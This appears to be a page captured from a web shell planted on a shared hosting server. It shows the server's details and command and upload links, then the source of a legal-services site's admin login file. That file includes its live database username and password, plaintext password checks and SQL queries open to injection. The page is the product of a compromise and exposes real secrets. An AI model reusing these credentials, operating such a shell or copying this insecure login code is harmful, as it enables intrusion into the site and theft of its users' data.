Server IP : 103.53.40.154 / Your IP : 3.144.90.108 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/kanoonisamadhan.in/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); // connect to database $db = mysqli_connect('localhost', 'ppcad7no_kanoonisam', 'V[n4$Ig7EK$2', 'ppcad7no_kanoonisam'); // variable declaration $username = ""; $email = ""; $errors = array(); // call the register() function if register_btn is clicked // if (isset($_POST['register_btn'])) { // register(); // } // REGISTER USER // function register(){ // // call these variables with the global keyword to make them available in function // global $db, $errors, $username, $email; // // receive all input values from the form. Call the e() function // // defined below to escape form values // $username = e($_POST['username']); // $email = e($_POST['email']); // $phone = e($_POST['phone']); // $password_1 = e($_POST['password_1']); // $password_2 = e($_POST['password_2']); // // form validation: ensure that the form is correctly filled // if (empty($username)) { // array_push($errors, "Username is required"); // } // if (empty($email)) { // array_push($errors, "Email is required"); // } // if (empty($phone)) { // array_push($errors, "Mobile Number is required"); // } // if (empty($password_1)) { // array_push($errors, "Password is required"); // } // if ($password_1 != $password_2) { // array_push($errors, "The two passwords do not match"); // } // // register user if there are no errors in the form // if (count($errors) == 0) { // $name = ($_POST['name']); // $username = ($_POST['username']); // $email = ($_POST['email']); // $phone = ($_POST['phone']); // $password = ($_POST['password_1']);//encrypt the password before saving in the database // if (isset($_POST['user_type'])) { // $user_type = e($_POST['user_type']); // $query = "INSERT INTO login_tbl (name, username, email, phone, user_type, password) // VALUES('$name', '$username', '$email', '$phone', '$user_type', '$password')"; // mysqli_query($db, $query); // $_SESSION['success'] = "New user successfully created!!"; // header('location: home.php'); // }else{ // $query = "INSERT INTO login_tbl (name, username, email, phone, user_type, password) // VALUES('$name', '$username', '$email', '$phone', 'user', '$password')"; // $result = mysqli_query($db, $query); // if($result){ // echo ("<script> // window.alert('Succesfully Submitted'); // window.location.href='register.php'; // </script>"); // mysqli_close($db); // } // // echo "submitted"; // // get id of the created user // // $logged_in_user_id = mysqli_insert_id($db); // // $_SESSION['user'] = getUserById($logged_in_user_id); // // put logged in user in session // // $_SESSION['success'] = "You are now logged in"; // // header('location: ../register.php'); // } // } // } if (isset($_POST['login_btn'])) { login(); } // LOGIN USER function login(){ global $db, $username, $errors; // grap form values $username = e($_POST['username']); $password = e($_POST['password']); // make sure form is filled properly if (empty($username)) { array_push($errors, "Username is required"); } if (empty($password)) { array_push($errors, "Password is required"); } // attempt login if no errors on form if (count($errors) == 0) { // $password = md5($password); // Query for login_tbl $query1 = "SELECT * FROM login_tbl WHERE username='$username' AND password='$password' LIMIT 1;"; $results1 = mysqli_query($db, $query1); if (mysqli_num_rows($results1) == 1) { // user found in login_tbl // check if user is admin or user $logged_in_user = mysqli_fetch_assoc($results1); if ($logged_in_user['user_type'] == 'supadmin') { $_SESSION['user'] = $logged_in_user; $_SESSION['success'] = ""; header('location: index.php'); } else if ($logged_in_user['user_type'] == 'admin') { $_SESSION['user'] = $logged_in_user; $_SESSION['success'] = ""; header('location: index.php'); } else if ($logged_in_user['user_type'] == 'user') { $_SESSION['user'] = $logged_in_user; $_SESSION['success'] = ""; header('location: home.php'); } else { $_SESSION['msg'] = "Invalid user type"; header('location: login.php'); } } else { $_SESSION['msg'] = "Invalid username or password"; header('location: login.php'); } // Query for payment_page // $query2 = "SELECT * FROM tbl_member WHERE username='$username' AND password='$password' LIMIT 1"; // $results2 = mysqli_query($db, $query2); // if (mysqli_num_rows($results2) == 1) { // user found in payment_page // $logged_in_user = mysqli_fetch_assoc($results2); // $_SESSION['user'] = $logged_in_user; // $_SESSION['success'] = ""; // header('location:member_home.php'); // } // No user found in either table array_push($errors, "Wrong username/password "); } } function isAdmin() { if (isset($_SESSION['user']) && $_SESSION['user']['user_type'] == 'admin' ) { return true; }else{ return false; } } // return user array from their id function getUserById($id){ global $db; $query = "SELECT * FROM login_tbl WHERE id= $id"; $result = mysqli_query($db, $query); $user = mysqli_fetch_assoc($result); return $user; } // escape string function e($val){ global $db; return mysqli_real_escape_string($db, trim($val)); } function display_error() { global $errors; if (count($errors) > 0){ echo '<div class="error">'; foreach ($errors as $error){ echo $error .'<br>'; } echo '</div>'; } } function isLoggedIn() { if (isset($_SESSION['user'])) { return true; }else{ return false; } } if (isset($_GET['logout'])) { session_destroy(); unset($_SESSION['user']); header("location: login.php"); } ?>